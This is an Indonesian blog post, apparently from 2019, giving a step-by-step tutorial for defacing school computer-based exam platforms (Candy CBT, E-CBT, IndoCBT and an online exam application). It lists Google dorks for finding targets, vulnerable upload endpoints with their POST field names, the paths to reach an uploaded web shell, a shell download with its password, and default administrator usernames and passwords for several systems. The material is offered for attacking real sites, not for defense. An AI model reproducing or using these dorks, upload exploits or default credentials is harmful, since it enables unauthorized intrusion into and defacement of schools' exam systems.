Deface Candy Cbt 2019
Kamis, 19 September 2019
Tulis Komentar
tutorial deface candy CBT
Bug Candy Cbt 2019
Bahan Bahan :
Shell Or Scrip
Jika belum ada Download shell nya di sini
Password shell : IndoXploit
Hp Pc/lepi + Kuota/wifi
Dork :
- inurl :Candycbt Inurl:login.php
- inurl:CandyCbt + Login.php
(Selebihnya Use Your Brain)
Exploit :
plugins/uploadfile/demo/upload.php
Post File :Myfile
Tutorial :
=> Dorking target Di Google Pake Dork Di Atas Atau? Selebihnya.
=>Kalo Udah Nemu Target Tinggal Masukin Exploitnya.
-Contoh :
/plugins/uploadfile/demo/upload.php
/plugins/uploadfile/php/upload.php
/plugins/uploadfile/demo/demo.html(Tidak Perlu Menggunakan Csrf Untuk Exploit Ini)
Postfile : myfile
Note : Jika Blank Vuln
Untuk Aksesnya
plugins/uploadfile/demo/uploads/shellkalian.php
E-CBT
Untuk Cbt Ini Dengan Admin Week Pass Atau Default Password
Dork :
- CBT E School
- intitle:Login Peserta + cbt
Untuk User Dan Pw Nya Sebagai Berikut
- User : adminutama
- Pass : admin12345
- User : admin1
- Pass : admin12345
- User : admin2
- Pass : admin12345
- User : admin3
- Pass : admin12345
Page Adminnya
http://E-CBT.sch.id/admin/login.php
Note : Jika Ingin Upload Shell Untuk CBT ini Harus Di Tamper Gan
IndoCBT
Untuk Cbt Ini Gua Udah Lama Gua Nemu Bugnya :v
Dork :
- "INDOCBT" inurl:login.php
- "Belajar Online" inurl:login.php
- INDOCBT last update :
Untuk Exploitnya Dan Postfilenya:
- /aksi/upload-file.php
- Postfile : uploadfile
- /aksi/uploadbanner.php
- Postfile: uploadfile4
Akses Shell
- http://site.info/images/shell Kalian.php
Terakhir Adalah Aplikasi Ujian Online
Nah Ini Gua Gak Tahu Ini Cbt Apa Bukan Intinya Kalo Untuk Deface Ini Dengan Admin Week Pass Sama Seperti E-CBT
Dan Untuk Pict Atau Gambarnya Seperti Ini
Dork :
- intitle:Aplikasi Ujian Online + login.php
Untuk User Dan Passnya :
- User : admin
- Pass : admin
Dan Untuk Admin Pagenya
- http://ujian.sch.id/admin/
Ok Sekian Untuk Deface Cbt
Belum ada Komentar untuk "Deface Candy Cbt 2019"
Posting Komentar